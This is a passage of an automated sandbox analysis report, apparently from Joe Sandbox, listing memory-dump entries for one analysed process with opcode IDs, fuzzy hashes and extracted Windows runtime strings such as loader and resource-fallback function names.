                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: #%u
                                                                                                                                    • API String ID: 48624451-232158463
                                                                                                                                    Strings
                                                                                                                                    • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                                                                    • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                    • API String ID: 0-4066393604
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `$`
                                                                                                                                    • API String ID: 0-197956300
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                                    • API String ID: 2994545307-634100481
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$MUI
                                                                                                                                    • API String ID: 0-17815947
                                                                                                                                    Strings
                                                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                                                                    • kLsE, xrefs: 01720540
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                    • API String ID: 0-2547482624
                                                                                                                                    Strings
                                                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                    • API String ID: 0-2876891731
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: MUI
                                                                                                                                    • API String ID: 0-1339004836
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                                                    • Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
                                                                                                                                    • Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                                                    • Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                                                    • Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
                                                                                                                                    • Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                                                    • Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: GlobalTags
                                                                                                                                    • String ID: .mui
                                                                                                                                    • String ID: EXT-
                                                                                                                                    • String ID: BinaryHash
                                                                                                                                    • String ID: #
                                                                                                                                    • String ID: BinaryName
                                                                                                                                    Strings
                                                                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017A895E
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                    • Instruction ID: 9721b5e01ae2eb0bafb21969d6708c399d3bf107ccd0a0786175bb3ca6c9a106
                                                                                                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                    • Instruction Fuzzy Hash: 60F17071E0021A9BDB15DFA9C584BAEFBF5BF48710F088129EA46AB345E734D841DB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                    • Instruction ID: 444b36b14249ee1f9a8dc10e92bbb23e2a0e7e0a27f9d195f6c5bd1b8689ce56
                                                                                                                                    • Opcode Fuzzy Hash: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                    • Instruction Fuzzy Hash: 9AD1E171A0060A8BDF15CF69C881BFEF7F9AF88304F1881AAD955E7241D735EA05CB61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                    • Instruction ID: ccbe04446b6093c0de2c51b1b71074fcea9298715a671d7af77c1df27869e052
                                                                                                                                    • Opcode Fuzzy Hash: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                    • Instruction Fuzzy Hash: 2DE16B71608352CFC715DF28C490A6AFBE0BF89314F15896EF99587352EB31E906CB92
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                    • Instruction ID: 5cc4ea796fa55ace53f6aaf07122a5d34fbdef9a8ac48347a906ba0713462d21
                                                                                                                                    • Opcode Fuzzy Hash: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                    • Instruction Fuzzy Hash: C9D1EF71A002069BDF14DF6CC880ABAF7A5BF54314F14466DEA16DB288EB34E951CB62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                    • Instruction ID: d623bdc20124b2e94263ff13738f51357e4db6214912d9809230375a038651a2
                                                                                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                    • Instruction Fuzzy Hash: 22B1BE75A00605AFEB24DF98C944BABFBB9BFC4305F90462DAA4297394DA30E905CB11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                    • Instruction ID: c2094183a5523e73012e033723a4f7dfb41a39ebd0bcabb5032f9140a1097150
                                                                                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                    • Instruction Fuzzy Hash: 0BB1E531604646AFDB26DB68C854FBEFBF6AF84300F280199E552D7386DB70E941DB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                                                                                                    • Instruction ID: da7fb99e1c3d095bbfcd58ab7e874d5a139ff70be9b325233726a6df487ccaa3
                                                                                                                                    • Opcode Fuzzy Hash: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                                                                                                    • Instruction Fuzzy Hash: 36C166702083818FE764DF19C494BABF7E4BF88304F54496DE98987291E775EA09CF92
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
                                                                                                                                    • Instruction ID: 988fcff5d82b4b5e6ef6969dfcf36f7d438e0c40c30f93ac00d11697c8e41a60
                                                                                                                                    • Opcode Fuzzy Hash: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
                                                                                                                                    • Instruction Fuzzy Hash: A5B17070A402668BEB75CF68C880BADF7B5EF44700F1485E9D50AE7285EB70DD85CB21
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3b40a1b95e585a1e8a01af482c55631f4db393bae4921e134111cc1d1a360c51
                                                                                                                                    • Instruction ID: 188991f072076a5147c2e248b41ecc058eda3bd3857a9c64f25a64bf63d4ab27
                                                                                                                                    • Opcode Fuzzy Hash: 3b40a1b95e585a1e8a01af482c55631f4db393bae4921e134111cc1d1a360c51
                                                                                                                                    • Instruction Fuzzy Hash: A8A10831E406159FEB22EB6CC848FADFBB4FB41724F150165EA41AB291DB789E40CB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5731b741abe93caa5cf0aa13a85c340b19c06b75fbf2c06e3dbd8f9b56b79135
                                                                                                                                    • Instruction ID: 0a8e8d5f18d13c9ff991e977b7f7fcc39d7ea4e8eb07f3d42be652a36e77dcd4
                                                                                                                                    • Opcode Fuzzy Hash: 5731b741abe93caa5cf0aa13a85c340b19c06b75fbf2c06e3dbd8f9b56b79135
                                                                                                                                    • Instruction Fuzzy Hash: 4BA1D071B016169FEB25CF69D994BAAFBB9FF44314F10402DEE0597281EB34E815CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 954c02d474f10d2ed02cca660ed3cc9af5ec203f0f101cec44a491e4f30fb0c2
                                                                                                                                    • Instruction ID: 7279c3148844472d2515d42ada9479fe2bf873a2ab00441392b9c8ef8424d6d8
                                                                                                                                    • Opcode Fuzzy Hash: 954c02d474f10d2ed02cca660ed3cc9af5ec203f0f101cec44a491e4f30fb0c2
                                                                                                                                    • Instruction Fuzzy Hash: 1BA1BC72A042129FC721DF18C984B6BFBE9FF48714F15096CE6869B756D334E901CB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                    • Instruction ID: 983883864fa0d9b2c8fc550bc1d2915554e315b70810915df305889f4213b6cc
                                                                                                                                    • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                    • Instruction Fuzzy Hash: 75B11A71E0061ADFDB19CFA9C880AAEFBB5FF48310F148169EA15A7356D730E941CB94
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8bf9d0b7cd024688c99de58f15d88da3fcddf8f87171fc4791659d6e5613a378
                                                                                                                                    • Instruction ID: b5e7b84019ce338960b60bec5f85cd23cc05fa70a8fbd7ac8b4c1d42ee910d87
                                                                                                                                    • Opcode Fuzzy Hash: 8bf9d0b7cd024688c99de58f15d88da3fcddf8f87171fc4791659d6e5613a378
                                                                                                                                    • Instruction Fuzzy Hash: 0E91C271D00216AFDB15CFA8D894BAEFFB5AF88710F594269F610EB341D734E9019BA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: db00a338fde8402787964195fddf6ffcb28add4f1589bcf391a8eb26641e309d
                                                                                                                                    • Instruction ID: 932794fc67d18cea46b01bfb3ab67f1986645c212215795d717ef76d4cbe5040
                                                                                                                                    • Opcode Fuzzy Hash: db00a338fde8402787964195fddf6ffcb28add4f1589bcf391a8eb26641e309d
                                                                                                                                    • Instruction Fuzzy Hash: A34125707016019BDB29DB2DC98CB3BFBDAEF89220F088659E9158B394DB30D811C692
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a8c650c3f2f4b8e9246ef3331c289eba3ff56bb57fb52e42a10b6843aef1a675
                                                                                                                                    • Instruction ID: 6896321c3f81ba5daa52d8fad44db2d99849c83a4b2b855e212a948312ba62ca
                                                                                                                                    • Opcode Fuzzy Hash: a8c650c3f2f4b8e9246ef3331c289eba3ff56bb57fb52e42a10b6843aef1a675
                                                                                                                                    • Instruction Fuzzy Hash: C9518D72900216EFCB21DFA9C9849AEFBF9FF88214BA04659D545A7309D770AE41CFD0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                    • Instruction ID: 1df99fbdb7486ae86913550185994b8ecf984a3d15bb95d2e9e4e9d995a98567
                                                                                                                                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                    • Instruction Fuzzy Hash: 5B412D71A007069FCB25CF28C888A6BF7E9FF88210B05466DE91287645EB30FE14C7D0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5b78377f977a9d48aaab0a78129f8063ffd255bc7ca5554de6b2d58da3af77ed
                                                                                                                                    • Instruction ID: c960f0d32ce83a57d76ab66f097992065e5fc7b321d3356d3572ce272b1bb86a
                                                                                                                                    • Opcode Fuzzy Hash: 5b78377f977a9d48aaab0a78129f8063ffd255bc7ca5554de6b2d58da3af77ed
                                                                                                                                    • Instruction Fuzzy Hash: 54418736A002199BDB54DF98C440AEEFBB4BF48710F14816EFD15AB341E7B59D41CBA4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cbb8eeecbd7929612060d613afa3c857215c0a1060c887428f26db6a29d53ac1
                                                                                                                                    • Instruction ID: 1f78ffb8882b396c5f275a042e9b1e65e4e550475a00146905971f843301fdcf
                                                                                                                                    • Opcode Fuzzy Hash: cbb8eeecbd7929612060d613afa3c857215c0a1060c887428f26db6a29d53ac1
                                                                                                                                    • Instruction Fuzzy Hash: 6D41E6726043019FD721EF28C884A2BF7E9FF88224F104869E597C7356EB34E8848B54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                    • Instruction ID: abcccb145c8f5796743e0dcd8e2f62e2b7a559093b7a1861d1974bd0d095fb17
                                                                                                                                    • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                    • Instruction Fuzzy Hash: 5A517A75A01619CFCB15CF9DC480AAEF7B2FF84710F2881A9D915AB351D730AE86CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 54cdb137fd1da61f7086e91762bc8521a3278dba42ba4f4fec6f4a4474da85eb
                                                                                                                                    • Instruction ID: 24498ab5f7a40e449c6405bb27eeb39a5611cbe770d2d1e690b0aefcbcb6946d
                                                                                                                                    • Opcode Fuzzy Hash: 54cdb137fd1da61f7086e91762bc8521a3278dba42ba4f4fec6f4a4474da85eb
                                                                                                                                    • Instruction Fuzzy Hash: 4C513971944226DBDB25DB28CC04BE8FBB5FF15304F1442E6E929972C6E7749982CF80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 32f64544cd46a171d8acdc4e77b81aec54228b480b2cc025bfe09739cfae362f
                                                                                                                                    • Instruction ID: 24d9aa149488f5b624fd5112c73292f7b70db8f8e7f44c41e76e59a669a18b95
                                                                                                                                    • Opcode Fuzzy Hash: 32f64544cd46a171d8acdc4e77b81aec54228b480b2cc025bfe09739cfae362f
                                                                                                                                    • Instruction Fuzzy Hash: 9C418175A002299BDF21DF68C944BEAF7B8AF49740F0100E5E909AB241DB749E81CFA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                    • Instruction ID: 6ba6deed1fc95d9e7b1a7d9c945859dcb169b4e877bb1a09aa972936fcbf7790
                                                                                                                                    • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                    • Instruction Fuzzy Hash: F2418675B10105ABDB15DF99CC88AAFFBFAAF8C714F1440A9E904A7346DA70DD01CB61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 98eacc5a5fabc49f0b0815114b63629f388536ad016d9390bed1615b6cc58f4a
                                                                                                                                    • Instruction ID: 12f32f77ba5321fa813aec699e4f2fc029480b845d09f4eeaa6f7a864ba981f0
                                                                                                                                    • Opcode Fuzzy Hash: 98eacc5a5fabc49f0b0815114b63629f388536ad016d9390bed1615b6cc58f4a
                                                                                                                                    • Instruction Fuzzy Hash: A241A0B17007129FE725CF28C484A26F7F9FF89314B144AADE58787A51E770E946CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
